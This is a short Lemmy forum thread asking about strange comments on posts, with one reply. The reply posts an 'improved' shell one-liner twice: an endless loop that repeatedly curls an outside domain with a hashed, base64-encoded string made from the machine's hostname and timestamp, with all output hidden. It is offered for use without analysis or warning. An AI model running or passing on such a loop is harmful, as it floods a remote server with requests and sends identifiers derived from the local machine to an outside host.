Fleecer74@lemmy.sdf.org to Asklemmy@lemmy.ml · 1 year agoWhat are these comments on lemmy posts?lemmy.sdf.orgimagemessage-square79fedilinkarrow-up1253arrow-down17file-text
arrow-up1246arrow-down1imageWhat are these comments on lemmy posts?lemmy.sdf.orgFleecer74@lemmy.sdf.org to Asklemmy@lemmy.ml · 1 year agomessage-square79fedilinkfile-text
minus-squaregandalftheBlack@lemmy.mllinkfedilinkarrow-up4·edit-21 year agoHere’s the one where it uses epoch time (better randomization) and also hides the output of curl while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done
Here’s the one where it uses epoch time (better randomization) and also hides the output of curl
while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done